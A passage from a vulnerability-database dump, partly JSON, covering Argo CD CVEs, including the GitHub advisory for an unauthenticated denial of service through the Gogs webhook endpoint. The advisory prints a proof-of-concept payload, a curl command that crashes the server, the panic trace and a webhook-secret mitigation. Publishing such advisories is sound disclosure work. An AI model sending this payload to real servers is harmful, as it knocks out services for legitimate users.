"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf",
"url": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv"
}
],
"release_date": "2025-10-01T21:09:08.870000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:48:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17731"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/argoproj/argo-cd: Argo CD unauthenticated Remote Denial of Service"
}
]
}
FKIE_CVE-2025-59537
Vulnerability from fkie_nvd - Published: 2025-10-01 21:16 - Updated: 2025-10-07 14:34
Severity ?
Summary
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43 | Patch | |
| security-advisories@github.com | https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2 | Exploit, Vendor Advisory, Mitigation | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2 | Exploit, Vendor Advisory, Mitigation |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CDA16487-4630-4646-9952-32E096B64251",
"versionEndIncluding": "1.8.7",
"versionStartIncluding": "1.2.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD4B38D5-4CEC-4C24-AD81-92B9DA4426AC",
"versionEndExcluding": "2.14.20",
"versionStartIncluding": "2.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7FEAEBF-40B8-40E4-B34B-2785B0FEAFEB",
"versionEndExcluding": "3.0.19",
"versionStartIncluding": "3.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF4E847-D3D6-457A-A47B-98799D28E20E",
"versionEndExcluding": "3.1.8",
"versionStartIncluding": "3.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_cd:3.2.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "247C0721-E494-4732-BF53-F249C574A702",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19."
}
],
"id": "CVE-2025-59537",
"lastModified": "2025-10-07T14:34:45.730",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-10-01T21:16:43.577",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory",
"Mitigation"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory",
"Mitigation"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
},
{
"lang": "en",
"value": "CWE-476"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-476"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-WP4P-9PXH-CGX2
Vulnerability from github – Published: 2025-09-30 18:28 – Updated: 2025-10-23 20:22
VLAI?
Summary
argo-cd vulnerable unauthenticated DoS via malformed Gogs webhook payload
Details
Summary
Unpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients.
With the default configuration, no webhook.gogs.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null.
Details
Users can access /api/webhook without authentication, and when accessing this endpoint, the Handler function parses webhook type messages according to the header (e.g. X-Gogs-Event) and body parameters provided by the user. The Parse function simply unmarshals JSON-type messages. In other words, it returns a data structure even if the data structure is not exactly matched.
The affectedRevisionInfo function parses data according to webhook event types(e.g. gogsclient.PushPayload). However, due to the lack of data structure validation corresponding to these events, an attacker can cause a Denial of Service (DoS) attack by sending maliciously crafted data. because of Repository is Pointer Type.
func affectedRevisionInfo(payloadIf any) (webURLs []string, revision string, change changeInfo, touchedHead bool, changedFiles []string) {
switch payload := payloadIf.(type) {
// ...
case gogsclient.PushPayload:
webURLs = append(webURLs, payload.Repo.HTMLURL) // bug
// ...
}
return webURLs, revision, change, touchedHead, changedFiles
}
PoC
payload-gogs.json
{
"ref": "refs/heads/master",
"before": "0000000000000000000000000000000000000000",
"after": "0a05129851238652bf806a400af89fa974ade739",
"commits": [{}]
}
curl -k -v https://argocd.example.com/api/webhook \
-H 'X-Gogs-Event: push' \
-H 'Content-Type: application/json' \
--data-binary @/tmp/payload-gogs.json
An attacker can cause a DoS and make the argo-cd service unavailable by continuously sending unauthenticated requests to /api/webhook.
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x68 pc=0x280f494]
goroutine 302 [running]:
github.com/argoproj/argo-cd/v2/util/webhook.affectedRevisionInfo({0x3bd8240?, 0x40005a7030?})
/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:233 +0x594
github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).HandleEvent(0x40000f9140, {0x3bd8240?, 0x40005a7030?})
/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:254 +0x38
github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool.func1()
/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:128 +0x60
created by github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool in goroutine 1
/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:121 +0x28
Mitigation
If you use Gogs and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.
If you do not use Gogs, you can set the webhook secret to a long, random value to effectively disable webhook handling for Gogs payloads.
apiVersion: v1
kind: Secret
metadata:
name: argocd-secret
type: Opaque
data:
+ webhook.gogs.secret: <your base64-encoded secret here>
For more information
- Open an issue in the Argo CD issue tracker or discussions
- Join us on Slack in channel #argo-cd
Credit
Sangjun Song (s0ngsari) at Theori (theori.io)
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"last_affected": "1.8.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.14.19"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0-rc1"
},
{
"fixed": "2.14.20"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.0-rc1"
},
{
"fixed": "3.2.0-rc2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"3.2.0-rc1"
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.7"
},
